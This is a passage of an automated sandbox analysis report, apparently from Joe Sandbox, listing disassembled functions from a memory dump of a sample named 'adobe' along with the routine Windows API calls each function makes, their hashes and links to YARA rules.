                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AttributesErrorFileLast
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1799206407-0
                                                                                                                                                          • Opcode ID: b1313862b735acf36ecf6f7e8dc159732f58253739bf9a5dab4a362ad4fff649
                                                                                                                                                          • Instruction ID: b815831808181ea2df36f5baafd21cc1f6e17761c2faf862e3375c8032269dda
                                                                                                                                                          • Opcode Fuzzy Hash: b1313862b735acf36ecf6f7e8dc159732f58253739bf9a5dab4a362ad4fff649
                                                                                                                                                          • Instruction Fuzzy Hash: D6F02870A04B08ABDB10DFA59D014AEB3B8EB4932575047B7FC14A3382D7785E084588
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0042324C Relevance: 3.0, APIs: 2, Instructions: 35COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F00), ref: 00423259
                                                                                                                                                          • LoadCursorA.USER32(00000000,00000000), ref: 00423283
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CursorLoad
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3238433803-0
                                                                                                                                                          • Opcode ID: f8ffac14a906f8b64a7fc8a6c8ab7a97eb5bbf96c971544edaeb3bf4604a13a0
                                                                                                                                                          • Instruction ID: 4bac6b1dd1e4bc4155aef89283820d70f6b19f6d084946fd63ee35bdac132fa3
                                                                                                                                                          • Opcode Fuzzy Hash: f8ffac14a906f8b64a7fc8a6c8ab7a97eb5bbf96c971544edaeb3bf4604a13a0
                                                                                                                                                          • Instruction Fuzzy Hash: 0BF05C11700110ABDA105D3E6CC0E2A7268DB82B36B6103BBFE3AD32D1CA2E1D01017D
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0042E2BC Relevance: 3.0, APIs: 2, Instructions: 33libraryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SetErrorMode.KERNEL32(00008000), ref: 0042E2C6
                                                                                                                                                          • LoadLibraryA.KERNEL32(00000000,00000000,0042E310,?,00000000,0042E32E,?,00008000), ref: 0042E2F5
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLibraryLoadMode
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2987862817-0
                                                                                                                                                          • Opcode ID: 37d4004467aedf9023216c3f2fcd60aa1c38cfe2935b93077bdbbd30db4f209d
                                                                                                                                                          • Instruction ID: 1f7e49cd896e1bdba9cb1c47732ae581670473b421036b970d27c02fb23a5fd1
                                                                                                                                                          • Opcode Fuzzy Hash: 37d4004467aedf9023216c3f2fcd60aa1c38cfe2935b93077bdbbd30db4f209d
                                                                                                                                                          • Instruction Fuzzy Hash: ACF05E70614744BEDB029F679C6282ABAECE74DB1179248BAF800A7691E63D58108928
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0046D25C Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetVersion.KERNEL32(00000428,0046D2F2), ref: 0046D266
                                                                                                                                                          • 756FE550.OLE32(00498B78,00000000,00000001,00498B88,?,00000428,0046D2F2), ref: 0046D282
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: E550Version
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1323609852-0
                                                                                                                                                          • Opcode ID: 2adb852dba3f4503b09edf3856c4535be32f6068aae6262c518fac7c77d88ac4
                                                                                                                                                          • Instruction ID: 958c817140785bfd31846451c6a0f61a4aae663e2f42346d0c9f081eae2f78dd
                                                                                                                                                          • Opcode Fuzzy Hash: 2adb852dba3f4503b09edf3856c4535be32f6068aae6262c518fac7c77d88ac4
                                                                                                                                                          • Instruction Fuzzy Hash: FEF08C70B50200DFEB20A72AEA46B4B37D0D761324F5841BBB044A62A4E7B99480CA9E
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 004162DA Relevance: 3.0, APIs: 2, Instructions: 27COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetClassInfoA.USER32(00400000,?,?), ref: 004162F1
                                                                                                                                                          • GetClassInfoA.USER32(00000000,?,?), ref: 00416301
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ClassInfo
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3534257612-0
                                                                                                                                                          • Opcode ID: 95fcc31a687e8085c8d51d7c5e8386a7ebbc1e12afa0a833ee919d12e52ce4aa
                                                                                                                                                          • Instruction ID: 0adfc10981bdfd058f0d6bb489ac923dd3d4ff6eaebe16c9951958678d3e783c
                                                                                                                                                          • Opcode Fuzzy Hash: 95fcc31a687e8085c8d51d7c5e8386a7ebbc1e12afa0a833ee919d12e52ce4aa
                                                                                                                                                          • Instruction Fuzzy Hash: 50E01AB26025256AEB10DFA98D81EE32ADCDB09310B120263BE04CA286D764DD009BA8
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0044FF68 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SetFilePointer.KERNEL32(?,00000000,?,00000002,?,?,0046F291,?,00000000), ref: 0044FF7E
                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,?,00000002,?,?,0046F291,?,00000000), ref: 0044FF86
                                                                                                                                                            • Part of subcall function 0044FD24: GetLastError.KERNEL32(0044FB40,0044FDE6,?,00000000,?,004964F4,00000001,00000000,00000002,00000000,00496655,?,?,00000005,00000000,00496689), ref: 0044FD27
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLast$FilePointer
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1156039329-0
                                                                                                                                                          • Opcode ID: f1cd58a8cf726d465307f1e8f278df003916846b189d09f473ae9249fd5d3cf5
                                                                                                                                                          • Instruction ID: 9df3285b9075c770bf714b43e5b43c103d04428e9e05de1097f7b932a45787f3
                                                                                                                                                          • Opcode Fuzzy Hash: f1cd58a8cf726d465307f1e8f278df003916846b189d09f473ae9249fd5d3cf5
                                                                                                                                                          • Instruction Fuzzy Hash: 69E012B53042015FFB10EAA599C1F3B63D8DB45318F00447BB944CE183E674CC098B65
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00406274 Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Global$Alloc
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2558781224-0
                                                                                                                                                          • Opcode ID: 3aab631d28e9500c64151c0aeb9b91af43aad549cba5a5fa87d1f146672bdb4f
                                                                                                                                                          • Instruction ID: 0263706b80ae8aebac4b2aeda69df254121a1764ed820e2db5cbcbfbef09bb73
                                                                                                                                                          • Opcode Fuzzy Hash: 3aab631d28e9500c64151c0aeb9b91af43aad549cba5a5fa87d1f146672bdb4f
                                                                                                                                                          • Instruction Fuzzy Hash: 3D9002C4C10B01A4DC0432B24C0BC3F0C2CD8C072C3C0486F7018B6183883C8800083C
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 004014E4 Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017ED), ref: 00401513
                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017ED), ref: 0040153A
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Virtual$AllocFree
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2087232378-0
                                                                                                                                                          • Opcode ID: 86d3033056ee1eeb69ed56595d455cb9815cc57517e3e671329daeadf9e1ec36
                                                                                                                                                          • Instruction ID: b33c25bc9d44e5855224c25112d8485d4e2e4d0ac397fdc44bd3a0d1e7be2c31
                                                                                                                                                          • Opcode Fuzzy Hash: 86d3033056ee1eeb69ed56595d455cb9815cc57517e3e671329daeadf9e1ec36
                                                                                                                                                          • Instruction Fuzzy Hash: 3BF08272A0063067EB60596A4C85B5359C49BC5794F154076FD09FF3E9D6B98C0142A9
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 004085E4 Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetSystemDefaultLCID.KERNEL32(00000000,0040871A), ref: 00408603
                                                                                                                                                            • Part of subcall function 00406DF4: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00406E11
                                                                                                                                                            • Part of subcall function 00408570: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049A4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DefaultInfoLoadLocaleStringSystem
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1658689577-0
                                                                                                                                                          • Opcode ID: 0c0846f6018fb18ca9a233b5544f45ce7783ff452534d63f167772a199f0b751
                                                                                                                                                          • Instruction ID: 93f846491c188cfa0342f854d2ed9f3c57c1d7a82097d89a8732084db8b3b420
                                                                                                                                                          • Opcode Fuzzy Hash: 0c0846f6018fb18ca9a233b5544f45ce7783ff452534d63f167772a199f0b751
                                                                                                                                                          • Instruction Fuzzy Hash: 11314375E001199BCF00DF95C8819DEB7B9FF84314F15857BE815AB286E738AE058B98
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0041FBAC Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SetScrollInfo.USER32(00000000,?,?,00000001), ref: 0041FC49
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InfoScroll
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 629608716-0
                                                                                                                                                          • Opcode ID: cabb8c3e19a8a88e92d5d776e573f6eee413a8791bccb1521323fae2b782b601
                                                                                                                                                          • Instruction ID: 2c7078d87c5cd90d2d28a279248f0ceb63a34b6d02ec849610dd04de18f9c6e3
                                                                                                                                                          • Opcode Fuzzy Hash: cabb8c3e19a8a88e92d5d776e573f6eee413a8791bccb1521323fae2b782b601
                                                                                                                                                          • Instruction Fuzzy Hash: AA213EB1608745AFD350DF39D4407AABBE4BB48314F04893EA498C3741E778E99ACBD6
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0046B610 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0041EEB4: GetCurrentThreadId.KERNEL32 ref: 0041EF03
                                                                                                                                                            • Part of subcall function 0041EEB4: 73A25940.USER32(00000000,0041EE64,00000000,00000000,0041EF20,?,00000000,0041EF57,?,0042ED24,?,00000001), ref: 0041EF09
                                                                                                                                                          • SHPathPrepareForWriteA.SHELL32(00000000,00000000,00000000,00000000,00000000,0046B66E,?,00000000,?,?,0046B87B,?,00000000,0046B8BA), ref: 0046B652
                                                                                                                                                            • Part of subcall function 0041EF68: IsWindow.USER32(?), ref: 0041EF76
                                                                                                                                                            • Part of subcall function 0041EF68: EnableWindow.USER32(?,00000001), ref: 0041EF85
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$A25940CurrentEnablePathPrepareThreadWrite
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 390483697-0
                                                                                                                                                          • Opcode ID: e03eb3e96cbdf10a5bd49a6075d4ad9eb7061a3b2e17c795c48b5758940daeb5
                                                                                                                                                          • Instruction ID: 5a7ac4f6dd7026821f63f8db9839e9502a484e666ce84196906c6456f1bc72a3
                                                                                                                                                          • Opcode Fuzzy Hash: e03eb3e96cbdf10a5bd49a6075d4ad9eb7061a3b2e17c795c48b5758940daeb5
                                                                                                                                                          • Instruction Fuzzy Hash: A1F09A71208300FFE7159B62ED16B1AB7A8E309718F51447BF904C65A0E7B9588089AE
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00440BE8 Relevance: 1.5, APIs: 1, Instructions: 36fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FileWrite
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3934441357-0
                                                                                                                                                          • Opcode ID: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                                                                                                          • Instruction ID: 028ceee379c3c7d470caefb370f3d10d378470f307764de9520dc446ef7e13f5
                                                                                                                                                          • Opcode Fuzzy Hash: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                                                                                                          • Instruction Fuzzy Hash: 1AF06D3090410AEFEB1CCF58D0A58BFB7A1EB48300B20856FE607C7790D638AE60DB58
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00416560 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,00000000,00400000,?), ref: 00416595
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateWindow
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 716092398-0
                                                                                                                                                          • Opcode ID: 99ee45e58afab452ebd8d8099a4319ca8bb03e99333467587a6c742e65940f0d
                                                                                                                                                          • Instruction ID: 13f77f5b12b5d4dba0df04b824f9bbdcdbf9abdef4ba7f4078844aaa66f06397
                                                                                                                                                          • Opcode Fuzzy Hash: 99ee45e58afab452ebd8d8099a4319ca8bb03e99333467587a6c742e65940f0d
                                                                                                                                                          • Instruction Fuzzy Hash: C3F013B2200510AFDB84CF9CD9C0F9373ECEB0C210B0881A6FA08CF24AD225EC108BB1
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 004149C4 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004149FF
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CallbackDispatcherUser
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2492992576-0
                                                                                                                                                          • Opcode ID: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                                                                                                          • Instruction ID: 59ac3629b8f45f7a6bca1b57e2bf54285868c68ba6336e642f1ef9b7bb8d2b05
                                                                                                                                                          • Opcode Fuzzy Hash: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                                                                                                          • Instruction Fuzzy Hash: B2F0DA762042019FC740DF6CC8C488A77E5FF89255B5546A9F989CB356C731EC54CB91
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0042CC98 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetFileAttributesA.KERNEL32(00000000,00000000,0042CCE0,?,00000001,?,?,00000000,?,0042CD32,00000000,00452095,00000000,004520B6,?,00000000), ref: 0042CCC3
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
